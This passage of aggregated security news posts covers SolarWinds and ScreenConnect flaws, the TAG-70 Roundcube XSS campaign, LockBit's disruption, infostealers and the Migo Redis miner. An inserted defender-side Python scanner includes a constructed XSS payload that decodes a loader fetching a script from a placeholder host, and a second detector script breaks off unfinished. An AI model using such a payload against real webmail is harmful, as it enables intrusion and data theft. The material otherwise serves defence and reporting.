SolarWinds Access Rights Manager (ARM) Traversal Remote Code Execution Vulnerability | CVE-2024-23477 | 7.9 High | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
SolarWinds Access Rights Manager (ARM) Deserialization of Untrusted Data Remote Code Execution Vulnerability | CVE-2024-23478 | 8.0 High | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
SolarWinds Access Rights Manager (ARM) Traversal Remote Code Execution Vulnerability | CVE-2024-23479 | 9.6 Critical | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
SQL Injection Remote Code Execution Vulnerability | CVE-2023-50395 | 8.0 High | 02/06/2024 | 02/06/2024 | SolarWinds Platform 2024.1
SQL Injection Remote Code Execution Vulnerability | CVE-2023-35188 | 8.0 High | 02/06/2024 | 02/06/2024 | SolarWinds Platform 2024.1

The three critical remote code execution flaws are:

  • CVE-2023-40057 (CVSS score 9.0): a deserialization of untrusted data issue. An authenticated user can exploit this vulnerability to abuse a SolarWinds service, resulting in remote code execution.
  • CVE-2024-23479 (CVSS score 9.6): a directory traversal vulnerability. An unauthenticated user can exploit this issue to achieve remote code execution.
  • CVE-2024-23476 (CVSS score 9.6): a directory traversal vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve remote code execution.

The company fixed the flaws with the release of Access Rights Manager 2023.2.3.

SolarWinds made the headlines in 2020, when a Russia-linked APT group carried out a supply chain attack that compromised the Orion software provided by the company.

In a filing with the US SEC, the company revealed that 18,000 customers might have been impacted by the cyber attack against its supply chain.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

How BRICS Got “Rug Pulled” – Cryptocurrency Counterfeiting is on the Rise

19 February 2024 at 11:39

Resecurity has identified an increasing trend of cryptocurrency counterfeiting, the experts found several tokens impersonating major brands, government organizations and national fiat currencies.

Resecurity has identified an increasing trend of cryptocurrency counterfeiting. Ongoing brand protection work for Fortune 100 companies by the cybersecurity company uncovered several tokens impersonating major brands, government organizations and even national fiat currencies.

As in any other booming industry, the decentralized finance (DeFi) and crypto space has attracted its fair share of scammers and bad actors. These individuals seek to lure investors into fake projects known as rug pulls, only to abscond with their funds.

A notable example of this deceptive practice is the emergence of a counterfeit token named ‘BRICS’ recently detected by Resecurity, which exploited the focus on the investment interest and potential expansion of the BRICS intergovernmental organization, comprising countries like Brazil, Russia, India, China, South Africa, Egypt, Ethiopia, Iran, and the United Arab Emirates. 

Besides running the scam, the bad actors also spread misinformation claiming that new countries had joined the alliance, even though those countries had not confirmed their membership. This is a good example of how bad actors capitalize on geopolitical narratives to profit from investment scams. Unverified reports that BRICS countries were adopting a gold-backed currency to compete with the US dollar and the Euro likely inspired the idea, which later turned into a creative crypto scam.

cryptocurrency counterfeiting 1


Leveraging a global international umbrella of the organization, fraudsters launched an initial coin offering (ICO) promoting the fake token offering various rewards.

cryptocurrency counterfeiting 2

This type of fraud was prominently observed on platforms such as Lobstr.co, which allows the creation of tokens on the Stellar network. Due to their flexibility in allowing users to offer their own tokens for trading, such platforms are especially susceptible to exploitation by cybercriminals.

cryptocurrency counterfeiting 3

The common fraudulent tactics they employ include ‘cryptocurrency counterfeiting’, where scammers create tokens with names like those of legitimate ones, and the aforementioned ‘rug pulls’.

As of today, the token was still available for trading and attracting victims:

https://stellar.expert/explorer/public/asset/BRICS-GBC7NIEHS6Q4EKHQAB7GPPNUPVVXX43D4VPWNO44X5YTLN4WKZZ53SAR

cryptocurrency counterfeiting 4

The offer has already generated some interest and claimed its first victims:

cryptocurrency counterfeiting 5

Resecurity warns Internet users to perform due diligence on new cryptocurrency offerings and to contact their local regulators to make sure they are legitimate.

Resecurity has identified and reported similar counterfeit cryptocurrency tokens promoted on the same platform impersonating:

  • one of the major oil corporations
  • national financial regulator
  • national currency
  • major real estate development

Some of these scams involved misleading information referencing the Monetary Authority of Singapore and the central bank of one of the countries in the Middle East.

According to Solidus Labs, ‘rug pull’ scams have defrauded over 2 million investors, surpassing the number of victims of major crypto failures like FTX, Celsius, and Voyager.

These scams typically manifest in two forms:

  • DeFi scams involve altering a token’s smart contract to defraud investors. Tactics used include making the token unsellable, enabling the creation of an unlimited number of new tokens, or imposing high trading fees.
  • Exit scams are characterized by extensive promotion of a token, followed by the scammers betraying investors. Methods include creating fake marketing websites, announcing non-existent partnerships, or using bots for wash trading.

The low barrier to entry for executing these scams makes them accessible to a broad range of malicious actors, eliminating the need for advanced programming skills. Utilizing platforms like Stellar to create misleadingly named tokens is a common strategy in these ‘rug pulls’.

The cryptocurrency landscape faces significant challenges in combating such fraudulent activities, highlighting the urgent need for increased vigilance and more robust regulatory frameworks.

More details are included in the analysis published by Resecurity:

https://www.resecurity.com/blog/article/how-brics-got-rug-pulled-crypto-counterfeiting-is-on-the-rise

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, cryptocurrency counterfeiting)

Russia-linked APT TAG-70 targets European government and military mail servers exploiting Roundcube XSS

19 February 2024 at 13:58

An APT group tracked as TAG-70, linked to Belarus and Russia, exploited XSS flaws in Roundcube webmail servers to target over 80 organizations.

Researchers from Recorded Future’s Insikt Group identified a cyberespionage campaign carried out by an APT group, tracked as TAG-70, linked to Belarus and Russia. The nation-state actors are known to have carried out cyber-espionage against government, military, and national infrastructure entities in Europe and Central Asia since at least December 2020.

Between October and December 2023, TAG-70 exploited cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers in attacks aimed at over 80 organizations, primarily in Georgia, Poland, and Ukraine.

“TAG70 has demonstrated a high level of sophistication in its attack methods. The threat actors leveraged social engineering techniques and exploited cross-site scripting vulnerabilities in Roundcube webmail servers to gain unauthorized access to targeted mail servers, successfully bypassing the defenses of government and military organizations.” reads the report published by Recorded Future’s Insikt Group.

TAG-70 Roundcube Russia

The researchers noticed similarities between this campaign and other activities conducted by other Russia-linked groups, such as BlueDelta (APT28) and Sandworm. These APT groups previously targeted email solutions, including Roundcube and Zimbra.

The compromise of email servers poses a substantial risk, especially during a conflict such as Russia-Ukraine. Threat actors can target email servers to gather intelligence about adversaries’ war efforts, diplomatic relationships, and coalition partnerships.

The attacks aimed at Iranian embassies in Russia and the Netherlands demonstrate a broader geopolitical interest in assessing Iran’s diplomatic activities, particularly its support for Russia in the context of the Ukrainian conflict. Similarly, the espionage against Georgian government entities reflects an interest in monitoring Georgia’s pursuits to access the European Union (EU) and NATO.

On July 27, 2023, the researchers identified a malicious JavaScript that was acting as a second-stage loader used by TAG70 prior to the exploitation of the Roundcube issue. ESET researchers also detailed the same attack chain.

The JavaScript is loaded through cross-site scripting (XSS) from a malicious email and decodes a Base64-encoded JavaScript payload (jsBodyBase64). The decoded payload is then inserted into the Document Object Model (DOM) of the Roundcube webpage within a newly created script tag.
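As an added defender-side example (not code from the Recorded Future report, from ESET or from Roundcube), the Python heuristics below scan an HTML email body for the ingredients of the loader described above: inline script or event handlers, and Base64 runs that decode to JavaScript which injects a script element into the DOM. The sample emails, the loader script and its hostname are constructed placeholders, not real TAG-70 artifacts.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Strings that, when found in decoded text, indicate JavaScript which injects a
# script element into the DOM, the behaviour the report attributes to the payload.
JS_INJECTION_MARKERS = (
    "createElement('script')",
    'createElement("script")',
    "appendChild(",
    "document.write(",
    "eval(",
    "atob(",
)

# Inline event handlers (onerror=, onload=, ...) and <script> bodies are the two
# places an XSS payload embedded in an HTML email can execute inside the webmail page.
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=\s*([\"'])(.*?)\1", re.I | re.S)
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Base64 runs of meaningful length; shorter tokens produce too many false positives.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


@dataclass
class Finding:
    kind: str          # "script_tag", "event_handler" or "b64_js_payload"
    snippet: str       # matched text, truncated for reporting
    decoded: str = ""  # decoded Base64 text when kind == "b64_js_payload"


def decode_base64_text(candidate: str) -> Optional[str]:
    """Decode a Base64 run; return the text only if it is valid and human-readable."""
    try:
        raw = base64.b64decode(candidate, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None  # binary content such as an inline image, not script


def looks_like_js_loader(text: str) -> bool:
    """True when decoded text carries DOM script-injection indicators."""
    return any(marker in text for marker in JS_INJECTION_MARKERS)


def scan_email_html(html: str) -> List[Finding]:
    """Flag inline script, event handlers and Base64 blobs that decode to loader-like JS."""
    findings: List[Finding] = []
    for m in SCRIPT_TAG_RE.finditer(html):
        findings.append(Finding("script_tag", m.group(0)[:80]))
    for m in EVENT_HANDLER_RE.finditer(html):
        findings.append(Finding("event_handler", m.group(0)[:80]))
    for m in B64_RE.finditer(html):
        decoded = decode_base64_text(m.group(0))
        if decoded and looks_like_js_loader(decoded):
            findings.append(Finding("b64_js_payload", m.group(0)[:40] + "...", decoded))
    return findings


# Constructed sample (hypothetical, not a real TAG-70 artifact): JavaScript that
# creates a <script> element and appends it to the DOM, mirroring the behaviour
# described for the decoded jsBodyBase64 payload. The hostname is a placeholder.
SAMPLE_LOADER_JS = (
    "var s=document.createElement('script');"
    "s.src='https://loader.example.invalid/stage2.js';"
    "document.body.appendChild(s);"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_LOADER_JS.encode()).decode()

# Constructed HTML email body: an inline event handler decodes and evaluates the blob.
SAMPLE_MALICIOUS_EMAIL = (
    "<html><body><p>Quarterly report attached.</p>"
    '<img src="x" onerror="eval(atob(\'' + SAMPLE_B64 + '\'))">'
    "</body></html>"
)

# Constructed benign email: a Base64 inline image decodes to binary, so it is not flagged.
SAMPLE_BENIGN_EMAIL = (
    '<html><body><p>Hello</p><img src="data:image/png;base64,'
    "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=="
    '"></body></html>'
)

if __name__ == "__main__":
    for email in (SAMPLE_MALICIOUS_EMAIL, SAMPLE_BENIGN_EMAIL):
        for f in scan_email_html(email):
            print(f"{f.kind}: {f.snippet}")
            if f.decoded:
                print("  decoded:", f.decoded)
```

The heuristics are deliberately simple; in a mail gateway they would feed a triage queue rather than block on their own.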

TAG-70 Roundcube Russia

The researchers recommend reading the detailed analysis of the recent TAG-70 campaign here.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Roundcube)

A Ukrainian Raccoon Infostealer operator is awaiting trial in the US

19 February 2024 at 15:01

The Raccoon Infostealer operator, Mark Sokolovsky, was extradited to the US from the Netherlands to appear in a US court.

In October 2020, the US Justice Department charged a Ukrainian national, Mark Sokolovsky (28), with computer fraud for allegedly infecting millions of computers with the Raccoon Infostealer.

The man was held in the Netherlands, where he was charged for his alleged role in the international cybercrime operation known as Raccoon Infostealer. He appealed the decision of a Dutch court granting his extradition to the United States, but he was eventually extradited to the US from the Netherlands to appear in a US court.

The Raccoon stealer was first spotted in April 2019, it was designed to steal victims’ credit card data, email credentials, cryptocurrency wallets, and other sensitive data.

Raccoon is offered for sale as a malware-as-a-service (MaaS) that implements an easy-to-use automated backend panel; the operators also offer bulletproof hosting and 24/7 customer support in both Russian and English. The Raccoon service costs $200 per month.

The Raccoon stealer is written in C++ by Russian-speaking developers who initially promoted it exclusively on Russian-speaking hacking forums. The malware is now also promoted on English-speaking hacking forums, and it works on both 32-bit and 64-bit operating systems.

Raccoon Infostealer

The analysis of the logs for sale in the underground community allowed the experts to estimate that Raccoon infected over 100,000 users worldwide at the time of its discovery.

The list of targeted applications includes cryptocurrency apps for major currencies (Electrum, Ethereum, Exodus, Jaxx, and Monero), popular browsers (Google Chrome, Mozilla Firefox, Microsoft Edge, Internet Explorer, Opera, Vivaldi, Waterfox, SeaMonkey, UC Browser) and email clients such as Thunderbird, Outlook, and Foxmail.

Dutch authorities arrested Sokolovsky in March 2022; concurrent with his arrest, the FBI and law enforcement partners in Italy and the Netherlands dismantled the C2 infrastructure used by the Raccoon Infostealer operation.

The FBI identified more than 50 million unique credentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card numbers, etc.) in the stolen data. While the exact number of victims has yet to be verified, experts believe that millions of potential victims around the world were targeted by the operation.

The credentials appear to include over four million email addresses. The United States does not believe it is in possession of all the data stolen by Raccoon Infostealer and continues to investigate.

Sokolovsky is charged with computer fraud, wire fraud, money laundering and aggravated identity theft.

Sokolovsky faces a maximum penalty of 20 years in prison for the wire fraud and money laundering offenses, five years for the conspiracy to commit computer fraud charge, and a mandatory consecutive two-year term for the aggravated identity theft offense.

He appeared in a US court on February 9 and is currently awaiting trial.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Raccoon Infostealer)

Anatsa Android banking Trojan expands to Slovakia, Slovenia, and Czechia

19 February 2024 at 19:16

The Android banking trojan Anatsa resurged expanding its operation to new countries, including Slovakia, Slovenia, and Czechia.

In November 2023, researchers from ThreatFabric observed a resurgence of the Anatsa banking Trojan, aka TeaBot and Toddler. Between November and February, the experts observed five distinct waves of attacks, each focusing on different regions.

The malware previously focused its activities on the UK, Germany, and Spain, but the latest campaigns targeted Slovakia, Slovenia, and Czechia, which suggests a shift in its operational strategy.

The researchers classified Anatsa’s activity as “targeted,” with threat actors observed focusing on 3-5 regions at a time. According to ThreatFabric, the dropper applications were uploaded to Google Play in the targeted regions. The applications often reached the Top-3 in the “Top New Free” category, which helped trick users into believing that the application was legitimate and downloaded by a large number of users.

Anatsa

“Throughout this campaign, Anatsa’s Modus Operandi has evolved, displaying more sophisticated tactics such as AccessibilityService abuse, a multi-staged infection process, and the ability to bypass Android 13’s restricted settings.” reads the report published by ThreatFabric.

The researchers pointed out that some of the droppers successfully exploited the accessibility service and bypassed Google Play’s enhanced detection and protection mechanisms.

To avoid detection, the droppers adopted a multi-staged methodology, dynamically retrieving configuration and malicious executable files from their C2 server.

“All droppers in this campaign have demonstrated the capability to bypass the restricted settings for accessibility service in Android 13.” continues the report.

The experts observed five droppers in the latest campaign with over 100,000 total installations.  

Anatsa was first detected by the Italian cybersecurity firm Cleafy in March 2021 while it was targeting banks in Spain, Germany, Italy, Belgium, and the Netherlands.

TeaBot supports the common features of Android banking Trojans and, like other similar malware families, it abuses Accessibility Services. Below is a list of features implemented by the malware:

  • Ability to perform Overlay Attacks against multiple bank applications to steal login credentials and credit card information
  • Ability to send / intercept / hide SMS messages
  • Enabling keylogging functionalities
  • Ability to steal Google Authentication codes
  • Ability to obtain full remote control of an Android device (via Accessibility Services and realtime screen-sharing)

The Anatsa banking Trojan allows operators to take over the infected devices and execute actions on a victim’s behalf.

“Effective detection and monitoring of malicious applications, along with observing unusual customer account behaviour, are crucial for identifying and investigating potential fraud cases linked to device-takeover mobile malware like Anatsa.” concludes the report.

Below is a statement sent by a Google spokesperson to Security Affairs:

“All of the apps identified in the report have been removed from Google Play. Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Android banking malware)

Operation Cronos: law enforcement disrupted the LockBit operation

19 February 2024 at 23:14

An international law enforcement operation codenamed ‘Operation Cronos’ led to the disruption of the LockBit ransomware operation.

A joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries has disrupted the LockBit ransomware operation.

Below is the image of the Tor leak site of the Lockbit ransomware gang that was seized by the UK National Crime Agency (NCA).

“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” reads the banner.

“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation. Return here for more information at: 11:30 GMT on Tuesday 20th Feb”

The Operation Cronos operation is still ongoing, and the NCA announced that more information will be published tomorrow, February 20, 2024.

LockBit ransomware

vx-underground researchers contacted the administrators of the gang who confirmed that their infrastructure was seized by the FBI.

Lockbit ransomware group administrative staff has confirmed with us their websites have been seized. pic.twitter.com/SvpbeslrCd

— vx-underground (@vxunderground) February 19, 2024

LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.

According to a joint report published by US authorities and international peers, the total of U.S. ransoms paid to LockBit is approximately $91M since LockBit activity was first observed in the U.S. on January 5, 2020.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

Cactus ransomware gang claims the theft of 1.5TB of data from Energy management and industrial automation firm Schneider Electric

20 February 2024 at 07:01

The Cactus ransomware gang claims the theft of 1.5TB of data from the energy management and industrial automation firm Schneider Electric.

The Cactus ransomware group claims responsibility for pilfering 1.5TB of data from the energy management and industrial automation giant Schneider Electric.

Schneider Electric is a multinational company that specializes in energy management, industrial automation, and digital transformation.

In January, BleepingComputer first reported the attack that hit the Sustainability Business division of the company on January 17th. At the time, BleepingComputer contacted Schneider Electric which confirmed the data breach.

The attack impacted the services of Schneider Electric’s Resource Advisor cloud platform causing outages.

Schneider Electric said that other divisions of the company were not impacted by the cyber attack.

Today the Cactus ransomware gang published 25MB of allegedly stolen data on its Tor leak site.

Schneider Electric Cactus ransomware

The gang also published several pictures of passports and company documents as proof of the hack.

Cactus Ransomware has just posted Schneider Electric. https://t.co/ZlVILOuNFr pic.twitter.com/z91nfnGYAQ

— Dominic Alvieri (@AlvieriD) February 19, 2024

The Cactus ransomware operation has been active since March 2023, Kroll researchers reported that the ransomware strain is notable for the use of encryption to protect the ransomware binary.

Cactus ransomware uses the SoftPerfect Network Scanner (netscan) to look for other targets on the network along with PowerShell commands to enumerate endpoints. The ransomware identifies user accounts by viewing successful logins in Windows Event Viewer, it also uses a modified variant of the open-source PSnmap Tool.

The Cactus ransomware relies on multiple legitimate tools (e.g. Splashtop, AnyDesk, SuperOps RMM) to achieve remote access and uses Cobalt Strike and the proxy tool Chisel in post-exploitation activities.

Once the malware has escalated the privileges on a machine, the threat actors use a batch script to uninstall popular antivirus solutions installed on the machine.

Cactus uses the Rclone tool for data exfiltration and a PowerShell script called TotalExec, previously used by BlackBasta ransomware operators, to automate the deployment of the encryption process.

In early January, the Cactus ransomware group claimed to have hacked Coop, one of the largest retail and grocery providers in Sweden.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

More details about Operation Cronos that disrupted Lockbit operation

20 February 2024 at 16:11

Law enforcement provided additional details about the international Operation Cronos that led to the disruption of the Lockbit ransomware operation.

Yesterday, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation.

Below is the image of the Tor leak site of the Lockbit ransomware gang that was seized by the UK National Crime Agency (NCA).

LockBit ransomware

“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” reads the banner.

“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation. Return here for more information at: 11:30 GMT on Tuesday 20th Feb”

The Operation Cronos operation is still ongoing, and the NCA announced that more information has yet to be shared.

vx-underground researchers contacted the administrators of the gang who confirmed that their infrastructure was seized by the FBI.

Lockbit ransomware group administrative staff has confirmed with us their websites have been seized. pic.twitter.com/SvpbeslrCd

— vx-underground (@vxunderground) February 19, 2024

The operation led to the arrest of two members of the ransomware gang in Poland and Ukraine and the seizure of hundreds of crypto wallets used by the group.

The British NCA took control of LockBit’s central administration environment used by the RaaS affiliates to carry out the cyberattacks. The authorities also seized the dark web Tor leak site used by the group.

The Tor leak site was seized by the NCA and is now used to publish updates on the law enforcement operation and provide support to the victims of the gang.

Lockbit

The NCA also obtained the source code of the LockBit platform and a huge trove of information on the group’s operation, including information on affiliates and supporters.

Law enforcement also had access to data stolen from the victims of the ransomware operation, a circumstance that highlights the fact that even when a ransom is paid, the ransomware gang often fails to delete the stolen information.

“LockBit had a bespoke data exfiltration tool, known as Stealbit, which was used by affiliates to steal victim data. Over the last 12 hours this infrastructure, based in three countries, has been seized by members of the Op Cronos taskforce, and 28 servers belonging to LockBit affiliates have also been taken down.” reads the NCA’s announcement. “The technical infiltration and disruption is only the beginning of a series of actions against LockBit and their affiliates. In wider action coordinated by Europol, two LockBit actors have been arrested this morning in Poland and Ukraine, over 200 cryptocurrency accounts linked to the group have been frozen.”

The US Department of Justice has charged two individuals with orchestrating ransomware attacks using the LockBit ransomware; they are currently in custody and will stand trial in the US.

“The Justice Department also unsealed an indictment obtained in the District of New Jersey charging Russian nationals Artur Sungatov and Ivan Kondratyev, also known as Bassterlord, with deploying LockBit against numerous victims throughout the United States, including businesses nationwide in the manufacturing and other industries, as well as victims around the world in the semiconductor and other industries. Today, additional criminal charges against Kondratyev were unsealed in the Northern District of California related to his deployment in 2020 of ransomware against a victim located in California.” reads the press release published by DoJ. 

“Finally, the Department also unsealed two search warrants issued in the District of New Jersey that authorized the FBI to disrupt multiple U.S.-based servers used by LockBit members in connection with the LockBit disruption.”

Additionally, the US authorities have unveiled indictments against two Russian nationals, accusing them of conspiring to carry out LockBit attacks.

The NCA and its global partners have secured over 1,000 decryption keys that will allow victims of the gang to recover their files for free. The NCA will reach out to victims based in the UK in the coming days and weeks, providing support to help them recover encrypted data.

“This NCA-led investigation is a ground-breaking disruption of the world’s most harmful cyber crime group. It shows that no criminal operation, wherever they are, and no matter how advanced, is beyond the reach of the Agency and our partners.” said National Crime Agency Director General, Graeme Biggar.

“Through our close collaboration, we have hacked the hackers; taken control of their infrastructure, seized their source code, and obtained keys that will help victims decrypt their systems.”

“As of today, LockBit are locked out. We have damaged the capability and most notably, the credibility of a group that depended on secrecy and anonymity.

“Our work does not stop here. LockBit may seek to rebuild their criminal enterprise. However, we know who they are, and how they operate. We are tenacious and we will not stop in our efforts to target this group and anyone associated with them.”

The free decryptor for the Lockbit ransomware can be downloaded from the website of the ‘No More Ransom’ initiative. It’s unclear which version of the ransomware is targeted by the decryptor.

LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.

According to a joint report published by US authorities and international peers, the total of U.S. ransoms paid to LockBit is approximately $91M since LockBit activity was first observed in the U.S. on January 5, 2020.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

ConnectWise fixed critical flaws in ScreenConnect remote access tool

20 February 2024 at 21:06

ConnectWise addressed two critical vulnerabilities in its ScreenConnect remote desktop access product and urges customers to install the patches as soon as possible.

ConnectWise warns of the following two critical vulnerabilities in its ScreenConnect remote desktop access product:

  • CWE-288 Authentication bypass using an alternate path or channel (CVSS score 10)
  • CWE-22 Improper limitation of a pathname to a restricted directory (“path traversal”) (CVSS score 8.4)

Both vulnerabilities were reported on February 13, 2024, through the company’s vulnerability disclosure channel via the ConnectWise Trust Center. The company is not aware of attacks in the wild exploiting these vulnerabilities; however, due to the higher risk of being targeted by exploits, ConnectWise recommends installing the updates as emergency changes within days.

The issues impact ScreenConnect 23.9.7 and prior. Below is the remediation provided in the advisory:

Cloud 

There are no actions needed by the partner, ScreenConnect servers hosted in “screenconnect.com” cloud or “hostedrmm.com” have been updated to remediate the issue.  

On-premise 

Partners that are self-hosted or on-premise need to update their servers to version 23.9.8 immediately to apply a patch. 


Pierluigi Paganini

(SecurityAffairs – hacking, ConnectWise ScreenConnect remote desktop access product)

Microsoft Exchange flaw CVE-2024-21410 could impact up to 97,000 servers

21 February 2024 at 07:33

Researchers from Shadowserver Foundation identified roughly 28,000 internet-facing Microsoft Exchange servers vulnerable to CVE-2024-21410.

The vulnerability CVE-2024-21410 is a bypass vulnerability that can be exploited by an attacker to bypass the SmartScreen user experience and inject code to potentially gain code execution, which could lead to some data exposure, lack of system availability, or both.

“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf. For more information about Exchange Server’s support for Extended Protection for Authentication(EPA), please see Configure Windows Extended Protection in Exchange Server.” reads the advisory published by Microsoft.

The IT giant addressed the issue with the release of Patch Tuesday security updates for February 2024.

Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Microsoft also updated its advisory to label the flaw as actively exploited in the wild.

On 2024-02-17 Shadowserver researchers identified around 97K Exchange servers that were vulnerable or possibly vulnerable (running a vulnerable version, but possibly with the mitigation applied).

Out of 97,000 servers, 28,500 have been verified to be vulnerable to CVE-2024-21410.

Most of these servers are in Germany, followed by the United States. Below are the data shared by Shadowserver:

Data shared in our Vulnerable Exchange Server report – https://t.co/ApcM9HwiOK

Count of vulnerable instances on 2024-02-17: 28.5K

Count of possibly vulnerable instances on 2024-02-17: 68.5K

Please note this vulnerability is on the CISA KEV – https://t.co/bUYwEMNRY9

— Shadowserver (@Shadowserver) February 19, 2024
Country          Counted IP addresses
Germany          25,695
United States    21,997
United Kingdom   4,130
Netherlands      3,505
France           3,381
Austria          3,337
Russia           3,069
Canada           2,891
Switzerland      2,404
Australia        2,148
Italy            2,048
Czechia          1,392
China            1,221
Belgium          919
Turkey           881
Taiwan           870
Hong Kong        742
Hungary          624
Spain            570
South Africa     563

However, the researchers warn that the above results were calculated by summing counts of unique IPs, which means that a “unique” IP may have been counted more than once.


Pierluigi Paganini

(SecurityAffairs – ransomware, Microsoft Exchange) 

Critical flaw found in deprecated VMware EAP. Uninstall it immediately

21 February 2024 at 11:37

VMware urges customers to uninstall the deprecated Enhanced Authentication Plugin (EAP) after the disclosure of a critical flaw CVE-2024-22245.

VMware is urging users to uninstall the deprecated Enhanced Authentication Plugin (EAP) after the discovery of an arbitrary authentication relay flaw CVE-2024-22245 (CVSS score: 9.6).

A threat actor could trick a domain user with EAP installed in their web browser into requesting and relaying service tickets for arbitrary Active Directory Service Principal Names (SPNs).

“Arbitrary Authentication Relay and Session Hijack vulnerabilities in the deprecated VMware Enhanced Authentication Plug-in (EAP) were responsibly reported to VMware.” reads the advisory published by the virtualization giant. “A malicious actor could trick a target domain user with EAP installed in their web browser into requesting and relaying service tickets for arbitrary Active Directory Service Principal Names (SPNs).”

According to the advisory, there are no workarounds for this vulnerability.

The VMware Enhanced Authentication Plugin (EAP) was a software plugin designed to enable seamless login to vSphere’s management interfaces through integrated Windows Authentication and Windows-based smart card functionality on Windows client systems. The plugin was deprecated in 2021 with the release of vCenter Server 7.0u2.

The company also addressed an important severity session hijack vulnerability in EAP, tracked as CVE-2024-22250 (CVSS score 7.8).

“A malicious actor with unprivileged local access to a windows operating system can hijack a privileged EAP session when initiated by a privileged domain user on the same system.” continues the advisory.

The vulnerabilities were both reported by Ceri Coburn from Pen Test Partners.


Pierluigi Paganini

(SecurityAffairs – ransomware, CVE-2024-22245) 

New Redis miner Migo uses novel system weakening techniques

21 February 2024 at 14:55

A new malware campaign targets Redis servers to deploy the crypto miner Migo on compromised Linux hosts.

Cado Security researchers have observed a new malware campaign targeting Redis servers with a crypto miner dubbed Migo. The campaign stands out for the use of several novel system weakening techniques against the data store itself.

Migo is a Golang ELF binary with compile-time obfuscation, it is also able to maintain persistence on Linux hosts.

The researchers also observed the malware using a new version of a popular user mode rootkit to evade detection by hiding processes and on-disk artifacts.

The researchers initially discovered that new ‘Redis system weakening commands’ have been used in attacks in the wild, and then they noticed that these commands were used in a recent malware campaign aimed at Redis systems.

One of the honeypots used by Cado was targeted by an attack originating from the IP 103[.]79[.]118[.]221 which disabled the following configuration options using the Redis command line interface’s (CLI) config set feature:

  • protected-mode;
  • replica-read-only;
  • aof-rewrite-incremental-fsync;
  • rdb-save-incremental-fsync.

The attackers disabled these options in order to send additional commands to the Redis server and to allow future intrusions while evading defenses.

“After disabling these configuration parameters, the attacker uses the set command to set the values of two separate Redis keys.” reads the report published by Cado Security. “One key is assigned a string value corresponding to a malicious attacker-controlled SSH key, and the other to a Cron job that retrieves the malicious primary payload from Transfer.sh (a relatively uncommon distribution mechanism previously covered by Cado) via Pastebin.”
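A defender-side check for the command sequence just described, added here as an example and not taken from Cado’s report or tooling: it parses Redis MONITOR output (one line per client command) and flags a client that both disables the protective options with CONFIG SET and then stores a value resembling an SSH public key or a crontab entry. The MONITOR lines, client addresses, key names and key material are constructed samples.

```python
"""Flag the Redis "system weakening" sequence seen in the Migo campaign by
scanning Redis MONITOR output, whose lines have the shape
    <unix-ts> [<db> <client-ip:port>] "<COMMAND>" "<arg1>" ...
Reports clients that disable protective options via CONFIG SET and then
SET a value resembling an SSH public key or a crontab entry."""
import re
import shlex
from collections import defaultdict

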